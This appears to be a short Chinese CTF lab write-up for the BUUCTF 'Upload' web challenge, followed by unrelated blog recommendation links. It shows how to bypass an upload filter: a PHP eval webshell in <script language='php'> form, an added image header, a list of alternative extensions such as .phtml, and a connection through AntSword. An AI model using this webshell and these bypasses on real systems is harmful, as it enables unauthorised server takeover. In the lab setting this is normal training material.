buuctf web [极客大挑战 2019]Upload

上传头像,上传一下,看看能不能成功

抓包,抓取上传时的数据,看看限制条件

改两个地方,符合上传图片的要求,上传试试

一句话木马的<?被扳了

改一下木马的格式

<script language="php">eval($_POST['cmd']);</script>

别骗我,这不是图片

加一个图片头

但是此时文件格式为.jpg我们利用不了

所以,换成没有被过滤的网页格式

ps(补充):文件绕过的格式php,php3,php4,php5,phtml.pht

phtml没有被过滤,可以使用

上传成功,下面就要看看,上传的文件被放在了什么位置

根据题目提示,大胆猜测文件位置在/upload/1.phtml

先访问一下/upload

果然在这里

下面,打开蚁剑连接

连接成功

相关推荐
weixin_456904271 分钟前
UserManagement.vue和Profile.vue详细解释
前端·javascript·vue.js
资深前端之路4 分钟前
react 面试题 react 有什么特点?
前端·react.js·面试·前端框架
aaaweiaaaaaa5 分钟前
HTML和CSS学习
前端·css·学习·html
秋秋小事11 分钟前
React Hooks useContext
前端·javascript·react.js
Jinuss13 分钟前
Vue3源码reactivity响应式篇之reactive响应式对象的track与trigger
前端·vue3
striver_#14 分钟前
百度前端社招面经二
前端
xcnn_15 分钟前
前端入门——案例一:登录界面设计(html+css+js)
前端·css·html
ST.J15 分钟前
前端笔记2025
前端·javascript·css·vue.js·笔记
拉不动的猪16 分钟前
回顾vue中的Props与Attrs
前端·javascript·面试
Jerry1 小时前
使用 Material 3 在 Compose 中设置主题
前端